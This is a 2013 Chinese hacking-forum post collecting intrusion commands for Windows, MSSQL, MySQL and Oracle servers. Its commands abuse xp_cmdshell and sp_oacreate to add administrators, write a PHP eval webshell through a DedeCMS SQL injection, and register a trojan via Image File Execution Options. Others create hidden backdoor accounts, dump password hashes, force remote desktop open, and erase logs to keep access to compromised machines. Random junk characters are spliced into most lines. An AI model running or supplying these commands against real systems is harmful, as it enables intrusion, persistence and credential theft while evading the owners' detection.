找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 5252|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
- D9 X6 ^6 ?; p/ T0 c. l+ i0 z
1.net user administrator /passwordreq:no
, @0 V4 ^$ Z3 v2 z6 C这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了, {0 a+ q& B7 ]+ ]6 s9 j& U
2.比较巧妙的建克隆号的步骤. V9 g* {8 {' Z6 s
先建一个user的用户
4 i/ @7 E! l# l- v0 Q; [# D然后导出注册表。然后在计算机管理里删掉
6 J5 q! v/ L5 d1 m在导入,在添加为管理员组
3 |7 ?; B) z9 T0 K3.查radmin密码
: p1 t( f1 q. h8 I& I- zreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
% ^8 `8 F3 t) u. Q. ^4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]$ I9 \7 I: v/ C+ `7 S
建立一个"services.exe"的项4 |4 Y& f; O7 J. D
再在其下面建立(字符串值)
) Z* [6 D2 J2 l  u; l4 l键值为mu ma的全路径2 e) V0 M# p' p( P' d6 b( W" Q
5.runas /user:guest cmd
( K& K& [+ V- B$ y3 e' X# Y" b测试用户权限!
  X( W3 u2 ?7 p% ~) m- T3 j6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?% y: `# j: K, ?+ i2 C% M
7.入侵后漏洞修补、痕迹清理,后门置放:
7 P$ }2 x( l" O+ Z1 t基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
' m* V4 @2 z: g1 L8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
) \9 v3 V+ ?2 n/ z5 @1 [) ?+ u. P' ^* c% @$ U- m; t! j$ N
for example
3 i4 F$ ?# T7 l$ F4 X' j* H
0 B9 q9 ?! C$ {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'. ^6 }/ |( h9 i: ]$ r% b
( x" D; T' @9 r+ ]2 n' ^5 ]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'6 v, Q2 ?" S0 T, S. n
1 f: `, N6 Y# u# u% V( u* ^  G
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了  U. c1 i: ]' ~: ?1 D; h+ H
如果要启用的话就必须把他加到高级用户模式
8 a2 H, b7 w; A6 ]) Y, y& ?可以直接在注入点那里直接注入, ?8 q. c& D6 g3 ~: a6 d9 r
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--5 o+ f( s. c; U5 t
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
0 \' Q' g# L: Z; o6 K/ Z或者8 O& ?* T; ?) c
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
1 H! K4 A" y& \/ x0 m来恢复cmdshell。
3 u) o* K+ T  `  s( N0 @: u3 u
' o5 q) \$ B1 w5 H! p分析器( g8 X$ }5 w( m; ]9 }& b: I6 |: q
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--$ y3 A, r6 {6 s4 [. o
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")! u# z( G: i* L/ I
10.xp_cmdshell新的恢复办法& B" A6 x' v& ^' @2 B) P" W
xp_cmdshell新的恢复办法7 [9 ?* P9 G+ z" w: N1 A
扩展储存过程被删除以后可以有很简单的办法恢复:
$ w! S( x& `3 G删除  W6 W/ ~8 l6 Q  I
drop procedure sp_addextendedproc
( E$ f) I+ V9 ~( w  h' B$ ?drop procedure sp_oacreate& ^+ k8 g2 G% l6 S
exec sp_dropextendedproc 'xp_cmdshell'5 d. ?' o6 v" s

6 {8 ]) V- b' Q  D) E: p恢复  \9 L. X6 T- d9 v3 B" \1 a: `  p
dbcc addextendedproc ("sp_oacreate","odsole70.dll")( N/ v* B( @  B. P( A$ @" h
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
+ B# @/ N( i- O9 ^+ {: ]" |* t+ `' r
这样可以直接恢复,不用去管sp_addextendedproc是不是存在( J( D; A' R1 Z, r# _1 U' i+ x! `

! ^/ e- F* @/ ^, Y, N$ h5 t+ L-----------------------------7 V/ J5 C- S% s$ X0 i1 K1 ^( ~

4 z7 H+ c% g% S1 i& L' B" P删除扩展存储过过程xp_cmdshell的语句:: ?1 T4 A, {9 f3 I; S
exec sp_dropextendedproc 'xp_cmdshell'
2 g0 v' ^  }& U- R, g7 e  l8 {+ q5 `. T
恢复cmdshell的sql语句
% L6 `8 W) ]  e6 fexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
) J6 d2 X+ C- E" X5 d% o8 f# C: q  c, m! i

7 L) ~- _. _* Q( B开启cmdshell的sql语句; U: j+ V9 }  a" K& n* o

: e4 k6 Q  u/ a! G& d$ _0 q0 Gexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
8 D- c' J( g+ H5 \$ h1 I: z2 U8 b! x& i5 ?2 z6 b) s& \2 T
判断存储扩展是否存在
+ l" n: o4 i1 J% B" j' nselect count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
! ?& P) l6 S% A( J返回结果为1就ok
) s5 b9 _' |! o9 a) ^* b
+ w6 {  v  R/ K恢复xp_cmdshell
3 m9 ^8 c" c, p5 m7 L; B/ ^! f- aexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
# ]' \- |! y5 U& \8 e5 u0 S+ s返回结果为1就ok- B$ V# j3 }$ i% O
: |5 s, n1 I( B- V/ B1 u* q9 w
否则上传xplog7.0.dll
# C6 r5 f& p* |* a- Eexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
: x( i' g- ]+ L) C' R3 e. E* ^  G9 _, T( c
堵上cmdshell的sql语句
/ `* c' \# g2 n5 i! t: f  Ssp_dropextendedproc "xp_cmdshel1 |; u2 t- }+ V; H+ T
-------------------------: B4 \4 l1 r( m, T. a, M- @6 |
清除3389的登录记录用一条系统自带的命令:- c, q. T4 u  b' M; p
reg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f3 a0 o6 T% o8 K1 S& d1 R# U; l" L

; W% e. m$ T8 e4 G然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件2 i/ _% f4 p' {3 c2 z
在 mysql里查看当前用户的权限" q) H  i0 K7 C
show grants for  4 P. p. n# C# L6 H, ?, e
% y8 g0 \* d9 o" L6 y* F( _) }
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
3 N( y+ O1 C( L. h& t+ [
0 T3 I& k* m* Q7 X, O6 b' n7 L$ p4 f8 v# L9 [! f
Create USER 'itpro'@'%' IDENTIFIED BY '123';/ s3 C: p( N' J$ l6 g% O0 W

: [1 y2 ~8 f) u- d) Y/ u- tGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION7 j; z6 b& j4 D0 a$ f: f3 T2 \  k
3 Z& }$ N0 g- s( W; D9 ]" c5 n5 W
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 07 z! ~/ M7 `7 W) [0 F' G/ W) N

2 l) q; u: U# s3 E' ~MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;" N0 p7 R" y9 W+ F8 A
- D% G* E4 i6 W: |
搞完事记得删除脚印哟。
9 R2 B9 E# ?5 c' O- o
! ]7 F9 S5 p2 p1 M1 E, yDrop USER 'itpro'@'%';" E" k0 _5 P+ P; y3 b

4 b, j% c: T" @$ ~; MDrop DATABASE IF EXISTS `itpro` ;
9 p: p3 E, t- `% M# f3 r1 F7 v8 k7 R; z# R+ G8 U
当前用户获取system权限
+ O- }( }. R' [0 r7 L5 Csc Create SuperCMD binPath= "cmd /K start" type= own type= interact
6 C) `3 R# e+ L5 gsc start SuperCMD
  D" I5 C4 v7 |/ m' B, R, k程序代码7 y4 A' X9 t4 f9 `8 g
<SCRIPT LANGUAGE="VBScript">  @& Q9 g) K3 U$ i- r3 ^
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
3 o0 ~: N: ~( R( S  V% u. uos="WinNT://"&wsnetwork.ComputerName  _* M% z4 O6 I
Set ob=GetObject(os)
$ s1 W9 ?4 v! Z, w, ^- ySet oe=GetObject(os&"/Administrators,group")3 C$ S- W+ w* o
Set od=ob.Create("user","nosec")9 Q$ j4 g# d( N! o
od.SetPassword "123456abc!@#") y* [. c+ n' s% p' T& b. F- ^7 I" o
od.SetInfo  a7 C3 r: c  @5 J, h/ z
Set of=GetObject(os&"/nosec",user)
/ t$ y& ]- U. L8 X+ y" ]+ ~! h% U3 Toe.add os&"/nosec"
  ^/ \" V0 W2 ?8 P  F4 l8 a/ p3 C% o</Script>
- [% Q7 o" Y# q  M2 p/ N' J8 L0 f<script language=javascript>window.close();</script>* M$ W2 {: ?) a/ `+ C4 f7 L( C
" D4 U- t* Y. D

* h8 E3 t9 j; A, A6 ]( ^* b" M. c, y8 i' S0 e
/ Z* X4 X. R  m# D5 \
突破验证码限制入后台拿shell* ~% o. Z( C& d" U. j
程序代码
- o8 S9 o5 z& g6 m2 H% u! nREGEDIT4 ( }" U3 p) B/ T# x3 e
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 7 w" T" {# ]$ O# g
"BlockXBM"=dword:000000006 L, O1 p" A2 Y6 e8 C0 }# f

- t) k: e+ {$ i0 A" b- W保存为code.reg,导入注册表,重器IE  {) q  a/ m8 c/ [
就可以了& o% N2 u, {: D
union写马
3 F- B/ H+ H4 H程序代码
* L1 ?) K# R6 D9 j. b# w$ xwww.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
4 Y8 j0 d' C  N! M/ N+ i, a- L
3 D9 B: ^- F9 Z+ T+ a% Y9 {6 ~1 h应用在dedecms注射漏洞上,无后台写马6 T: I& s' n6 [9 U: \% {% p
dedecms后台,无文件管理器,没有outfile权限的时候* w2 V+ f9 ~' @6 L: ~, \
在插件管理-病毒扫描里
6 |; S8 w6 k$ M* w* P写一句话进include/config_hand.php里
4 b0 ^' K, Z. c3 l程序代码/ v7 v, {0 r5 v+ I
>';?><?php @eval($_POST[cmd]);?>, e- D7 Y# t& I9 G4 d0 O. y
( f5 o% K- D* J1 x
4 p8 M+ E- a, O: T: Q  }5 f! O
如上格式
  `8 ~; X" X- `+ t+ J5 D9 K! E( i1 y$ v
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
# Q. _0 J. m$ p" \2 x* T程序代码. A: m1 H0 _4 N" |! W
select username,password from dba_users;
4 c$ y5 ]3 l5 `" ?7 p% Q* p
% A+ `0 ?1 S1 E8 f7 |) v: J+ W6 W5 P, k; t- J2 s$ Z5 d
mysql远程连接用户6 q+ A) [2 B7 f* t: p
程序代码
+ ]- d$ [$ X8 T. z$ d! l" p/ g8 s3 E& F' e
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';. s4 |3 }/ p/ x4 i. s; t
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
- C1 |# U% V3 ]/ XMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 09 T, o& K6 r0 O7 G# R
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;9 G" T0 T; M6 {  {0 M
9 N' n8 N/ I9 i6 l. A% q
9 _/ O3 I+ _0 |8 L

* ]9 Q- C- ~1 r! Z( W3 G. |/ x% L: {5 ?. i) T: R
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 02 y! o8 f8 G, E& c/ x% [

3 \: G% s$ _; y: ]7 P% A& p1.查询终端端口8 \" U5 u2 {: ^, u, i& ~* k6 X- I

9 R6 Z+ g' W( M" A6 Q, ~! Y5 |5 ~xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber, X" V. _  L% Y
! U" {  X0 Z3 S( H; _8 C) g
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
; A3 n# S& ^# i* I( ztype tsp.reg
3 x  Y+ k$ V: G2 Y& S# N7 H
- O& U+ g7 F% M2.开启XP&2003终端服务3 `2 p' i3 Q5 b

" a8 P+ N: {8 i* f" L, y" r3 k: X2 [  @+ d5 F2 a: r7 O& L5 T0 j
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f- x6 S% }$ Z- C( b
1 v/ [- A* {9 L% @" O4 I, ?2 G( f

& t* L! e3 j4 e* Y7 r/ ]- qREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
! u0 a3 b3 ~+ B1 @/ k3 _$ ?  z6 d
3.更改终端端口为20008(0x4E28)# W1 D' M/ z5 |! S3 M" r
7 B$ Z: w2 ^2 E6 `# P% R/ t
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4 t0 C5 K6 y; ]& t/ q4 i  a
6 }$ I# e. _/ E7 CREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
' B5 n* l, l, a  |+ ~+ ]6 G( g. b8 c3 j5 i& ]" \& |1 m) s
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制$ z! Z& y, w5 t  S

7 U9 S% Q* D3 o% ?" TREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
1 a: t' I: e0 S: ^  I
( \' z- e% T0 V) V
) }1 y* M' ^( j/ e8 m5.开启Win2000的终端,端口为3389(需重启)( j' D# K: d+ s2 ~% M5 o* S
7 s2 r% a, M+ P% F: A6 Y
echo Windows Registry Editor Version 5.00 >2000.reg
& [5 R" N" r& B: secho. >>2000.reg
' E5 G: f8 k  |# l+ |/ l* Cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg : @6 k' o4 S+ k5 s; V: g
echo "Enabled"="0" >>2000.reg & Y9 M# B# \  A$ B0 ~" Q8 }, f+ i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
6 B* J8 m/ A! q4 gecho "ShutdownWithoutLogon"="0" >>2000.reg
1 n, ~: P% j: l4 P; u) Gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
, l, a% S9 h4 Decho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
7 y$ h% j2 A( Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
/ g3 c6 ^2 Y& wecho "TSEnabled"=dword:00000001 >>2000.reg % V$ b- N8 k( A* N( `# N- Y- ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg / l$ r* ]  H& v
echo "Start"=dword:00000002 >>2000.reg
, p# R* s0 C4 F% ^" z% ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 1 K/ L, ~' i9 L
echo "Start"=dword:00000002 >>2000.reg ' `- W" H- c* ?* ~
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ) y# r6 H; Z+ G/ H
echo "Hotkey"="1" >>2000.reg " t8 X( Z8 s# t" f  y. r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
2 {+ _0 |' N2 z5 Iecho "ortNumber"=dword:00000D3D >>2000.reg
5 \5 U5 G! |4 U3 r! p8 i5 Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg . a2 n1 a! f! x/ i' D+ ~) U' O
echo "ortNumber"=dword:00000D3D >>2000.reg
! j/ a% \7 D$ |! L: Z, V9 q7 a! m+ `6 M2 W& L3 l  Q
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
- L% I: k5 b  b* |4 \. U) {9 f4 k. L; _' q% l) }
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf* }$ }( y, C. n* r0 }" F  t8 L
(set inf=InstallHinfSection DefaultInstall)( \' N" p+ t$ W6 I! ~+ ?+ s% a5 T2 y
echo signature=$chicago$ >> restart.inf
. Q# O6 C$ E/ H/ e) kecho [defaultinstall] >> restart.inf) e5 f8 r% x4 A  v% J' v# N
rundll32 setupapi,%inf% 1 %temp%\restart.inf
' }& g7 Y% V% ?3 e. ~$ o1 I$ G4 l* m' @& i" M; h
# j! ]4 _! l) v5 [
7.禁用TCP/IP端口筛选 (需重启)4 t! y2 y. m3 P' D
& K3 ?2 s3 p, r1 F! F. P5 O8 |4 d
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f  e0 l0 U1 O( Y9 @  }/ B
% B* Q% N. W4 l  l# u5 |& B
8.终端超出最大连接数时可用下面的命令来连接
/ u/ `( U) J" }$ P6 a
9 p% g- k+ i" D* ^6 fmstsc /v:ip:3389 /console9 j. K- A; D9 R0 Q, w" O

# H* S: T* Z+ }6 u3 d, m9.调整NTFS分区权限1 w6 f( _( a' f5 S* u/ W
5 F  o9 q6 w/ z' a+ b3 S
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
; ^5 |' E$ N+ \0 T$ l$ |+ x7 a; `! |5 b: ~7 j
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
! g0 k, I$ N6 L5 J" ~8 o$ g6 _' D  Z3 H6 ]
------------------------------------------------------
- ]4 M) f- o' e4 W, D1 F3389.vbs & K, Q/ _" j* w3 Z% P3 K1 [
On Error Resume Next; l0 X; G- {* k0 Z1 q% x
const HKEY_LOCAL_MACHINE = &H80000002! o# w. M, b0 Q" b: W
strComputer = "."* q! f# r- R/ y6 K) E* \5 E
Set StdOut = WScript.StdOut
+ r8 I" N3 X+ C( l* m0 U. }5 aSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
* Z+ G1 U6 E4 I' S- T; tstrComputer & "\root\default:StdRegProv")5 m8 B( A) @4 t8 r: ?  F6 T9 n
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"4 k, k) L5 ]4 g$ Q( u
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath) e  w/ M! w7 A, Q
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
& P( _8 M* I8 w/ s( T1 aoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath. I( _+ q2 N8 v4 h
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", G  K% |2 `+ E1 ^; H9 T9 E/ N) }
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
% G0 J, V5 F* _/ cstrValueName = "fDenyTSConnections"8 m, z( I) W/ a& a; z
dwValue = 0
! o; B" ]+ W, c7 v" Moreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
! ?  }3 M: \6 _0 TstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
! b* O( o- L, f" K" AstrValueName = "ortNumber"
+ M0 W" J/ x% @! |5 HdwValue = 3389$ S: r& c  c9 `0 N: ]. ]
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
# D. o; {1 v' @" M+ T# h- [2 ystrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
* M: Y9 k6 v0 u4 K1 KstrValueName = "ortNumber"+ n% {& C1 E# \$ ~
dwValue = 3389
1 x/ A$ j% a2 e- koreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue4 y- g4 y! \% R& L: K. N
Set R = CreateObject("WScript.Shell") ; s8 \) b3 E* v3 o4 @
R.run("Shutdown.exe -f -r -t 0")
, ?3 [2 [7 X5 I; }# g4 z7 X6 P
6 R! [$ h! s1 Z  i6 w$ L/ H删除awgina.dll的注册表键值
% j( w4 @+ J( ^' h2 G4 S" I程序代码
& O9 O- ~6 P# s# Q$ V, h
# r; b- Z# p$ Mreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
" g0 Y# y  z7 s& G7 T- A9 i' e2 d
* f' v& p7 B" J9 W* {* Y
3 s( o2 Z3 ?0 P' u' G
5 j0 N; [0 ?5 u% _
程序代码1 [1 w% [& D1 `3 a
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash8 d9 U' v2 T2 i3 u! L

: L# l& {4 x7 r0 R: E9 i设置为1,关闭LM Hash3 z- x" m3 r6 ^
3 V" ?- I% E$ k1 p7 J( c" R* X
数据库安全:入侵Oracle数据库常用操作命令) i# K& v  F" O3 l+ b% e
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
; z: T7 \# {2 H1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。8 \1 b  B9 `" e6 g
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
$ E! w4 h; g) }& c- Z8 |% I* C/ F3、SQL>connect / as sysdba ;(as sysoper)或
$ Y0 k# p+ ~* ]4 v, nconnect internal/oracle AS SYSDBA ;(scott/tiger): M- y$ j5 G+ F. \/ h
conn sys/change_on_install as sysdba;
5 l/ A7 U9 x3 K4、SQL>startup; 启动数据库实例
7 n' ~7 L! z" l' b6 a$ K# \5、查看当前的所有数据库: select * from v$database;
( ?( N2 n, I- Xselect name from v$database;
5 Q9 {( ^* t$ B& Q1 A0 E6、desc v$databases; 查看数据库结构字段# A6 o! [9 J+ O/ [& E: b
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:4 Q+ ~% |- u5 _
SQL>select * from V_$PWFILE_USERS;
/ [2 M* {- w" Z  o8 T" JShow user;查看当前数据库连接用户
3 O" A' e5 q7 R$ f% _8、进入test数据库:database test;
4 R7 C9 V+ m  f' P: I- h9、查看所有的数据库实例:select * from v$instance;) H" W- z% {- |, Y) e/ ?
如:ora9i
  O3 e$ a' x5 u- [% M10、查看当前库的所有数据表:
) Y. S5 q& M4 @% ASQL> select TABLE_NAME from all_tables;
! L5 R' p; K) b& U8 ^select * from all_tables;
- d" P2 _3 J% e% Q7 hSQL> select table_name from all_tables where table_name like '%u%';
+ J! Y# G6 A9 _2 D( ^6 PTABLE_NAME4 Y9 V& R6 L7 t
------------------------------% K* @8 n% v- I9 z$ |! b& B9 g! B
_default_auditing_options_* q( o7 [: ?) j: N6 J5 I0 S
11、查看表结构:desc all_tables;- K2 J" ~+ g  ^3 N
12、显示CQI.T_BBS_XUSER的所有字段结构:
: v* P4 i, X& c4 {6 d: @3 \% wdesc CQI.T_BBS_XUSER;
$ L! H( E, E4 X0 e4 F4 e13、获得CQI.T_BBS_XUSER表中的记录:
/ A9 T) B8 n5 O% H! Y& n) j; Gselect * from CQI.T_BBS_XUSER;! P; r5 n2 c2 ^! V) T1 K0 r/ W
14、增加数据库用户:(test11/test), s. N: m4 _8 a% o
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;8 v) Z; y; W8 }0 \8 }
15、用户授权:
" s% |1 l- o0 |; ^& k8 Y- _: J; r& rgrant connect,resource,dba to test11;( D! l0 Z! w: ?* |# [1 E
grant sysdba to test11;
% Y! {: [" @! L, D" `% vcommit;( a7 P3 N1 H/ R( |
16、更改数据库用户的密码:(将sys与system的密码改为test.)
3 N5 h; F5 b, {& Qalter user sys indentified by test;) r  w+ b  E( y' i- e
alter user system indentified by test;
& \6 X& |- }: T  g; p( m9 \# `. ^% ?& j# A9 z  R+ S
applicationContext-util.xml
2 x" f; d! w" Y) Q( L! t+ BapplicationContext.xml
# s7 e9 R( r, ^9 W+ H# @" `& Ustruts-config.xml: @. i% p' V4 a- u* P
web.xml5 c- [/ }( \/ q% {7 m7 e. x
server.xml' [' J$ [' B2 N( v0 @5 C# q% C
tomcat-users.xml$ k! J7 J5 O$ s
hibernate.cfg.xml
" q# u6 |+ [% u7 `5 q0 Cdatabase_pool_config.xml
  u4 G: O$ p( b$ n* H5 U, _) y# H& I+ _& _: ^/ s

* u  k% b; D! t/ A, Y4 \- F\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置: X+ z( e/ o; p
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
+ s3 @# M. E/ m) ?\WEB-INF\struts-config.xml  文件目录结构
" c& N8 g3 y2 b5 \4 A: g$ J3 e  |8 j2 p( F0 N
spring.properties 里边包含hibernate.cfg.xml的名称  _7 O/ E' i1 S4 r! x0 I( ?- ]

. B5 p& l* S7 f3 d1 U) I# f! H8 {/ t: p2 _7 Q( x5 l# ^
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml; a- A0 t! O  ?# N  ^# s$ W

* E2 O2 `3 `! C" q# W如果都找不到  那就看看class文件吧。。3 U9 ^( W! s) b% B9 W! i

% ?/ x, O- }: l6 M) u' D测试1:/ P! R4 }" D! r6 ~3 i9 d
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1' G5 _; Q/ k9 f: o; k' a  }
3 O  V! o! m& Q, e6 {
测试2:4 r) c, H& M6 [$ U" ]; |, U
7 [. k1 Y! Q- O, P% [" A
create table dirs(paths varchar(100),paths1 varchar(100), id int)
9 n0 [) E% l  I6 o' T5 y; W) D9 {/ q+ S, n, ^
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--1 W, ]9 C3 I7 r* g8 u0 p0 |

7 b% |" ?6 W, L5 B: r7 N4 CSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
/ _7 P; {5 _0 k4 A: Y6 f* h/ ?( f) V2 z. w6 i# J( a2 H5 N% z2 `
查看虚拟机中的共享文件:+ h' j$ B% z2 s9 P" i# n- o
在虚拟机中的cmd中执行
* P4 c  V' x& w2 [1 @3 _\\.host\Shared Folders
- A4 U5 M9 U5 P, U0 n& l; e: _; E& }8 g/ M. O; {
cmdshell下找终端的技巧5 M- J: t& `9 J# L' p1 z/ ?
找终端: & i( l( q: N+ }, F+ T$ r5 \
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 2 J$ i4 S: ?  e, L3 n" V
   而终端所对应的服务名为:TermService 4 C% c% O, e' A" v6 U8 k
第二步:用netstat -ano命令,列出所有端口对应的PID值!
1 H: [% R- G! T9 R3 h4 a   找到PID值所对应的端口0 q; ~) g1 l4 u6 z+ r
* k2 l: f2 V. u  G
查询sql server 2005中的密码hash  _* s# y- e* Y% N$ r
SELECT password_hash FROM sys.sql_logins where name='sa'
